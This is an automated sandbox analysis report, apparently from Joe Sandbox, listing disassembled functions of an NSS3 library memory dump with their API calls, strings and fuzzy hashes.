PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C8ACCB5
memcpy.VCRUNTIME140(6C9414F4,6C9402AC,00000090), ref: 6C8ACCD3
memcpy.VCRUNTIME140(6C941588,6C9402AC,00000090), ref: 6C8ACD2B

Part of subcall function 6C7C9AC0: socket.WSOCK32(?,00000017,6C7C99BE), ref: 6C7C9AE6
Part of subcall function 6C7C9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7C99BE), ref: 6C7C9AFC

Part of subcall function 6C7D0590: closesocket.WSOCK32(6C7C9A8F,?,?,6C7C9A8F,00000000), ref: 6C7D0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C8ACCB0

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 271b2fc7a47aa62d1774c70b31bfdba7b162738bc4825606334be2e565c5cf27
Instruction ID: 1f64b153939ae291cfc2ffd0ecd433b06f6f8c19c854781d26376467e7b11c0a
Opcode Fuzzy Hash: 271b2fc7a47aa62d1774c70b31bfdba7b162738bc4825606334be2e565c5cf27
Instruction Fuzzy Hash: 181196F1B182805EDB20BF5DDA067C23AB8A34725CF309929E516CBB41E775C4298BD6

Uniqueness

Uniqueness Score: -1.00%

Function 6C812520 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetFunctionList), ref: 6C812538
PR_LogPrint.NSS3( ppFunctionList = 0x%p,?), ref: 6C812551

Part of subcall function 6C8F09D0: PR_Now.NSS3 ref: 6C8F0A22
Part of subcall function 6C8F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C8F0A35
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C8F0A66
Part of subcall function 6C8F09D0: PR_GetCurrentThread.NSS3 ref: 6C8F0A70
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C8F0A9D
Part of subcall function 6C8F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C8F0AC8
Part of subcall function 6C8F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C8F0AE8
Part of subcall function 6C8F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C8F0B19
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C8F0B48
Part of subcall function 6C8F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C8F0C76
Part of subcall function 6C8F09D0: PR_LogFlush.NSS3 ref: 6C8F0C7E

Strings

C_GetFunctionList, xrefs: 6C812533
ppFunctionList = 0x%p, xrefs: 6C81254C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: ppFunctionList = 0x%p$C_GetFunctionList
API String ID: 1907330108-525396629
Opcode ID: 79e1bd1ebb5c7d1044cebdef92be8afa09114843254fe0145ff955ddc5839c82
Instruction ID: f25781f2c55788e557f60c9edeba86f49badfe399a3f1f306650f8908d0c196e
Opcode Fuzzy Hash: 79e1bd1ebb5c7d1044cebdef92be8afa09114843254fe0145ff955ddc5839c82
Instruction Fuzzy Hash: 1001C074709145DFDB60AF18DA8C79933F1F78731EF248825E409D2A11DB389449CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C9414E4,6C8ACC70), ref: 6C8F8569
gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C8F85AD
GetLastError.KERNEL32(?,00000004,00000002), ref: 6C8F85B6
PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C8F85C6

Part of subcall function 6C7D0F00: PR_GetPageSize.NSS3(6C7D0936,FFFFE8AE,?,6C7616B7,00000000,?,6C7D0936,00000000,?,6C76204A), ref: 6C7D0F1B
Part of subcall function 6C7D0F00: PR_NewLogModule.NSS3(clock,6C7D0936,FFFFE8AE,?,6C7616B7,00000000,?,6C7D0936,00000000,?,6C76204A), ref: 6C7D0F25

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
String ID:
API String ID: 4254312643-0
Opcode ID: bbc47b9c22643c2e5c9ad35e113ffc1a2d9d1dddbea3846d3a11291ccac313b9
Instruction ID: 9526fd8f005669b2fd5c2b86909b348b95d6d7d334f219f8b324116b65b81157
Opcode Fuzzy Hash: bbc47b9c22643c2e5c9ad35e113ffc1a2d9d1dddbea3846d3a11291ccac313b9
Instruction Fuzzy Hash: 8441E6B0608316ABD7318B37CA4435977B4AB4736CF184B2BC93543AC1D7749D9687C1

Uniqueness

Uniqueness Score: -1.00%

Function 6C830420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C81C97F,?,?,?), ref: 6C8304BF
TlsGetValue.KERNEL32(00000000,?,6C81C97F,?,?,?), ref: 6C8304F4
EnterCriticalSection.KERNEL32(?,?,?,6C81C97F,?,?,?), ref: 6C83050D
PR_Unlock.NSS3(?,?,?,?,6C81C97F,?,?,?), ref: 6C830556

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: 71a475125e9bf8e5fee1357aca2d3e14b724a775eb8435feec3a6b55b8a76339
Instruction ID: 33e97f33d3c5dfd906de1629fbbbd59032f936357dee9a9f87dd2b329a1675bd
Opcode Fuzzy Hash: 71a475125e9bf8e5fee1357aca2d3e14b724a775eb8435feec3a6b55b8a76339
Instruction Fuzzy Hash: 9C418DB0A016568FDB24DF69C640669BBF0FF44318F14A96DD8AD9BB01E730E891CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C852C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C851289,?), ref: 6C852D72

Part of subcall function 6C853390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C852CA7,E80C76FF,?,6C851289,?), ref: 6C8533E9
Part of subcall function 6C853390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C85342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C851289,?), ref: 6C852D61

Part of subcall function 6C850B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C850B21
Part of subcall function 6C850B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C850B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C851289,?), ref: 6C852D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C851289,?), ref: 6C852DAF

Part of subcall function 6C80B8F0: PR_CallOnceWithArg.NSS3(6C942178,6C80BCF0,?), ref: 6C80B915
Part of subcall function 6C80B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C80B933
Part of subcall function 6C80B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C80B9C8
Part of subcall function 6C80B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C80B9E1

Part of subcall function 6C850A50: SECOID_GetAlgorithmTag_Util.NSS3(6C852A90,E8571076,?,6C852A7C,6C8521F1,?,?,?,00000000,00000000,?,?,6C8521DD,00000000), ref: 6C850A66

Part of subcall function 6C853310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C852D1E,?,?,?,?,00000000,?,?,?,?,?,6C851289), ref: 6C853348

Part of subcall function 6C8506F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C852E70,00000000), ref: 6C850701

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: e24dbca9ba26042bfe92da49e1fb5f13c001e0f9997edff108b12bea461e74cb
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 11314EB69002056BDB605E68EE40F9A3765BF4531EF540930FC145BB92FB71E938C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C7E6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7E6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7E6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C908FE0), ref: 6C7E6CFE

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: e93421f0c858ec1825dae8b3b315f4ba91a53f1a0c243db7c09d01bacb035e1d
Instruction ID: b2942581b53e72b907fa6b2e837da136f51803cce494db1e2a429a685dfe41a9
Opcode Fuzzy Hash: e93421f0c858ec1825dae8b3b315f4ba91a53f1a0c243db7c09d01bacb035e1d
Instruction Fuzzy Hash: A43183B2A0021A9FDB08CF65C951ABFBBF5EF49248B10443DDA05D7710EB31A915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C856DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C856E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C856E57

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C856E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C856EAA

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 9ee2b54dc6202c7650e3937e4fbc43371d55a7b741df98becb205f4ab88cb187
Instruction ID: c805cdcbed8ca8a272c47d1fc1e52a8e3747b92a6dae85ae55f637964ca21c8d
Opcode Fuzzy Hash: 9ee2b54dc6202c7650e3937e4fbc43371d55a7b741df98becb205f4ab88cb187
Instruction Fuzzy Hash: DE31E371716616EEDBB41E34DE04396B7A4AB0131AFB40E3CD499D6B40E7B17464CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6C848530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,6C8472EC), ref: 6C84855A

Part of subcall function 6C8407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7E8298,?,?,?,6C7DFCE5,?), ref: 6C8407BF
Part of subcall function 6C8407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8407E6
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C84081B
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C840825

PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C8472EC), ref: 6C84859E
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C8472EC), ref: 6C8485B8
PR_SetError.NSS3(FFFFE005,00000000,?,6C8472EC), ref: 6C848600

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
String ID:
API String ID: 1727503455-0
Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction ID: 198096285258b32bb79c0270279f068a9db3b49e88a813c0c5a75bb056067fef
Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction Fuzzy Hash: 4F212872A002195BE7208F2DDE40B2B76A9AF8131CF66CA3AD965D7750EB31DC05C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6C824FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C82B60F,00000000), ref: 6C825003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C82B60F,00000000), ref: 6C82501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C82B60F,00000000), ref: 6C82504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C82B60F,00000000), ref: 6C825064

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 83f85238c65346d92553cc1b5acf013db554b5543c3008899a74d803c3a5beb5
Instruction ID: 39cc432d17a1b3ce56ebda50eebf89b8594930c6f203df94dbf6f5040e9947d8
Opcode Fuzzy Hash: 83f85238c65346d92553cc1b5acf013db554b5543c3008899a74d803c3a5beb5
Instruction Fuzzy Hash: 7E3105B0A05A06CFDB10EF68C58896AFBF4FF48308B118929D8599B704E734E890CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C834590 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008,?,6C83473B,00000000,?,6C827A4F,?), ref: 6C83459B

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

TlsGetValue.KERNEL32(?,?,6C83473B,00000000,?,6C827A4F,?), ref: 6C8345BF
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C83473B,00000000,?,6C827A4F,?), ref: 6C8345D3
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C83473B,00000000,?,6C827A4F,?), ref: 6C8345E8

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
String ID:
API String ID: 2963671366-0
Opcode ID: 3e0ba5cd00da977f097cf5c010677ff10f23b4c2836b47253a71e37f80bf0828
Instruction ID: dd4d965675547905cbc36021866dbb6d66293143fbf0027c67c7afa055207dd1
Opcode Fuzzy Hash: 3e0ba5cd00da977f097cf5c010677ff10f23b4c2836b47253a71e37f80bf0828
Instruction Fuzzy Hash: 8721E2B0B00616ABEB209FA9DA4456ABBB4FF85219F105935D80CC7B10F731E914CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D04D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C7D04F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7D053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7D0558
GetLastError.KERNEL32 ref: 6C7D057A

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: 9da54d1935003656e0636fa0bf04d82e46298f32afe6abaa5e7c465b5fb9b99f
Instruction ID: 306b791eff178ddffa8bd0443571dc478df2dcdf13ddfa593400d2c63af30469
Opcode Fuzzy Hash: 9da54d1935003656e0636fa0bf04d82e46298f32afe6abaa5e7c465b5fb9b99f
Instruction Fuzzy Hash: 66216271A001189FDB14DF99DD98EAEB7B8FF89304B108529E809DB351D735ED06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C852DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C852E08

Part of subcall function 6C8414C0: TlsGetValue.KERNEL32 ref: 6C8414E0
Part of subcall function 6C8414C0: EnterCriticalSection.KERNEL32 ref: 6C8414F5
Part of subcall function 6C8414C0: PR_Unlock.NSS3 ref: 6C84150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C852E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C852E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C852E95

Part of subcall function 6C841200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C841228
Part of subcall function 6C841200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C841238
Part of subcall function 6C841200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C84124B
Part of subcall function 6C841200: PR_CallOnce.NSS3(6C942AA4,6C8412D0,00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C84125D
Part of subcall function 6C841200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C84126F
Part of subcall function 6C841200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C841280
Part of subcall function 6C841200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C84128E
Part of subcall function 6C841200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C84129A
Part of subcall function 6C841200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8412A1

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 0b76c0b4c5b8c7255eba74ebb5e20098a692dcf6536a03bb713a549ac128d96b
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 6D2126B1E003494BE760CF549E44BAB3764AFA130CF514679DD085B743FBF5E6A88292

Uniqueness

Uniqueness Score: -1.00%

Function 6C848680 Relevance: 6.1, APIs: 4, Instructions: 71threadCOMMON

Download Yara Rule

APIs

SEC_PKCS7DecoderStart.NSS3(6C848B00,00000000,?,?,6C8489A0,?,6C848980), ref: 6C8486CF

Part of subcall function 6C84D430: PORT_NewArena_Util.NSS3(00000400), ref: 6C84D43B
Part of subcall function 6C84D430: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C84D452
Part of subcall function 6C84D430: PORT_ZAlloc_Util.NSS3(00000044), ref: 6C84D48D
Part of subcall function 6C84D430: PORT_NewArena_Util.NSS3(00000400), ref: 6C84D4A0

SEC_PKCS7DecoderFinish.NSS3(?), ref: 6C848744
SEC_PKCS7DestroyContentInfo.NSS3(00000000), ref: 6C84875B

Part of subcall function 6C848810: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6C8486AA), ref: 6C848851
Part of subcall function 6C848810: PR_GetCurrentThread.NSS3 ref: 6C848937

PR_GetCurrentThread.NSS3 ref: 6C848765

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
